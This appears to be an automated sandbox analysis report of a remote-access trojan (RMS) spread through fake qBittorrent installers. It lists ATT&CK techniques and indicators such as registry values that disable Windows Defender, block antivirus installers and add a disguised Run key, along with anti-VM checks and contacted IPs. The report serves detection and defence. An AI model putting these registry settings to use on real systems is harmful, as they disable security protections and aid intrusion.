rms | 236abc9e419388c8554fc3d8a0e1fc20dfbf54955052839cddcce7c3fe26834d

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	GameGuard.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	GameGuard.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	GameGuard.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	GameGuard.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	GameGuard.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	GameGuard.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	GameGuard.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	GameGuard.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	GameGuard.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Contacts a large (2512) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 17 IoCs

Query Registry

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	update.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	smss.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	GameGuard.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	IP.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unsecapp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Setup.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
243319	2884	IP.exe
243426	2884	IP.exe

Blocks application from running via registry modification 29 IoCs

Adds application to list of disallowed applications.

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "KVRT(1).exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe"	GameGuard.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe"	GameGuard.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\27 = "rkill.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	GameGuard.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe"	GameGuard.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Modifies Windows Firewall 2 TTPs 8 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
872	netsh.exe
2044	netsh.exe
2276	netsh.exe
2832	netsh.exe
1564	netsh.exe
676	netsh.exe
3648	netsh.exe
2468	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWinst.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 34 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	IP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GameGuard.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GameGuard.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unsecapp.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 36 IoCs

pid	Process
980	qbittorrent_4.6.4_x64_setup.exe
1956	qbittorrent_4.1.9_setup.exe
2124	qbittorrent.exe
896	Setup.exe
2812	Setup.exe
1476	Setup.exe
2720	GameInstall.exe
2396	install.exe
2936	GameGuard.exe
2516	update.exe
928	win.exe
2768	svchost.exe
356	smss.exe
2884	IP.exe
2464	winserv.exe
1684	winserv.exe
2444	unsecapp.exe
2944	RDPWinst.exe
3488	winserv.exe
3500	unsecapp.exe
3528	winserv.exe
1984	unsecapp.exe
3948	winserv.exe
3788	unsecapp.exe
3424	winserv.exe
1944	unsecapp.exe
3108	winserv.exe
3704	unsecapp.exe
1560	winserv.exe
2876	unsecapp.exe
1944	unsecapp.exe
3752	winserv.exe
2176	winserv.exe
2112	unsecapp.exe
2516	winserv.exe
2408	unsecapp.exe

Loads dropped DLL 64 IoCs

pid	Process
980	qbittorrent_4.6.4_x64_setup.exe
980	qbittorrent_4.6.4_x64_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
1956	qbittorrent_4.1.9_setup.exe
2124	qbittorrent.exe
1104	Process not Found
2124	qbittorrent.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4068	icacls.exe
3120	icacls.exe
3692	icacls.exe
4068	icacls.exe
376	icacls.exe
3076	icacls.exe
4040	icacls.exe
676	icacls.exe
296	icacls.exe
3096	icacls.exe
916	icacls.exe
1904	icacls.exe
2396	icacls.exe
3944	icacls.exe
3460	icacls.exe
3860	icacls.exe
1996	icacls.exe
648	icacls.exe
1612	icacls.exe
3424	icacls.exe
3532	icacls.exe
2896	icacls.exe
1596	icacls.exe
3504	icacls.exe
4056	icacls.exe
3148	icacls.exe
3124	icacls.exe
2168	icacls.exe
3920	icacls.exe
3080	icacls.exe
3288	icacls.exe
4044	icacls.exe
3936	icacls.exe
3600	icacls.exe
3720	icacls.exe
2748	icacls.exe
3284	icacls.exe
3084	icacls.exe
3424	icacls.exe
1768	icacls.exe
3112	icacls.exe
312	icacls.exe
1784	icacls.exe
356	icacls.exe
288	icacls.exe
3596	icacls.exe
3636	icacls.exe
3640	icacls.exe
3968	icacls.exe
3816	icacls.exe
3804	icacls.exe
4016	icacls.exe
3032	icacls.exe
3196	icacls.exe
4004	icacls.exe
3824	icacls.exe
1572	icacls.exe
3980	icacls.exe
1100	icacls.exe
2300	icacls.exe
3928	icacls.exe
3496	icacls.exe
3912	icacls.exe
3756	icacls.exe

Themida packer 61 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000400000001cb9f-1639.dat	themida
behavioral1/memory/2124-1640-0x000000001BCB0000-0x000000001CDC4000-memory.dmp	themida
behavioral1/memory/896-1641-0x000000013F960000-0x0000000140A74000-memory.dmp	themida
behavioral1/memory/896-1642-0x000000013F960000-0x0000000140A74000-memory.dmp	themida
behavioral1/memory/896-1646-0x000000013F960000-0x0000000140A74000-memory.dmp	themida
behavioral1/memory/896-1649-0x000000013F960000-0x0000000140A74000-memory.dmp	themida
behavioral1/memory/1476-1901-0x000000013FD10000-0x0000000140E24000-memory.dmp	themida
behavioral1/memory/1476-1903-0x000000013FD10000-0x0000000140E24000-memory.dmp	themida
behavioral1/memory/1476-1902-0x000000013FD10000-0x0000000140E24000-memory.dmp	themida
behavioral1/memory/1476-1904-0x000000013FD10000-0x0000000140E24000-memory.dmp	themida
behavioral1/memory/1476-1906-0x000000013FD10000-0x0000000140E24000-memory.dmp	themida
behavioral1/memory/1476-1907-0x000000013FD10000-0x0000000140E24000-memory.dmp	themida
behavioral1/memory/1476-1905-0x000000013FD10000-0x0000000140E24000-memory.dmp	themida
behavioral1/files/0x000400000001ce99-2100.dat	themida
behavioral1/memory/2936-2112-0x000000013F5C0000-0x0000000140689000-memory.dmp	themida
behavioral1/memory/2936-2110-0x000000013F5C0000-0x0000000140689000-memory.dmp	themida
behavioral1/memory/2936-2114-0x000000013F5C0000-0x0000000140689000-memory.dmp	themida
behavioral1/memory/2936-2115-0x000000013F5C0000-0x0000000140689000-memory.dmp	themida
behavioral1/memory/2936-2116-0x000000013F5C0000-0x0000000140689000-memory.dmp	themida
behavioral1/memory/2936-2113-0x000000013F5C0000-0x0000000140689000-memory.dmp	themida
behavioral1/memory/2936-2111-0x000000013F5C0000-0x0000000140689000-memory.dmp	themida
behavioral1/memory/2936-2131-0x000000013F5C0000-0x0000000140689000-memory.dmp	themida
behavioral1/memory/2516-2133-0x000000013F020000-0x0000000140020000-memory.dmp	themida
behavioral1/memory/2516-2134-0x000000013F020000-0x0000000140020000-memory.dmp	themida
behavioral1/memory/2516-2132-0x000000013F020000-0x0000000140020000-memory.dmp	themida
behavioral1/memory/2516-2135-0x000000013F020000-0x0000000140020000-memory.dmp	themida
behavioral1/memory/2516-2136-0x000000013F020000-0x0000000140020000-memory.dmp	themida
behavioral1/memory/2516-2138-0x000000013F020000-0x0000000140020000-memory.dmp	themida
behavioral1/files/0x000500000001d851-2179.dat	themida
behavioral1/files/0x000400000001d85f-2182.dat	themida
behavioral1/memory/356-2183-0x000000013F8D0000-0x0000000140868000-memory.dmp	themida
behavioral1/memory/356-2185-0x000000013F8D0000-0x0000000140868000-memory.dmp	themida
behavioral1/memory/356-2186-0x000000013F8D0000-0x0000000140868000-memory.dmp	themida
behavioral1/memory/356-2184-0x000000013F8D0000-0x0000000140868000-memory.dmp	themida
behavioral1/memory/356-2187-0x000000013F8D0000-0x0000000140868000-memory.dmp	themida
behavioral1/memory/356-2188-0x000000013F8D0000-0x0000000140868000-memory.dmp	themida
behavioral1/memory/356-2196-0x000000013F8D0000-0x0000000140868000-memory.dmp	themida
behavioral1/files/0x000400000001d924-2230.dat	themida
behavioral1/memory/2444-2281-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/2444-2274-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/2444-2283-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/2444-2282-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/2444-2272-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/2444-2268-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/2444-2276-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/356-2530-0x000000013F8D0000-0x0000000140868000-memory.dmp	themida
behavioral1/memory/2516-2564-0x000000013F020000-0x0000000140020000-memory.dmp	themida
behavioral1/memory/1984-2573-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/1984-2574-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/1984-2578-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/1984-2577-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/1984-2576-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/1984-2579-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/1984-2575-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/1476-2583-0x000000013FD10000-0x0000000140E24000-memory.dmp	themida
behavioral1/memory/3788-2586-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/3788-2587-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/3788-2588-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/3788-2589-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/3788-2590-0x000000013FD40000-0x000000014133E000-memory.dmp	themida
behavioral1/memory/3788-2591-0x000000013FD40000-0x000000014133E000-memory.dmp	themida

Unexpected DNS network traffic destination 8 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	212.26.236.214
Destination IP	87.255.16.45
Destination IP	188.163.22.71
Destination IP	88.135.95.30
Destination IP	46.233.253.234
Destination IP	88.135.95.30
Destination IP	185.75.84.41
Destination IP	46.233.253.234

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	IP.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 17 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	update.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	GameGuard.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	unsecapp.exe

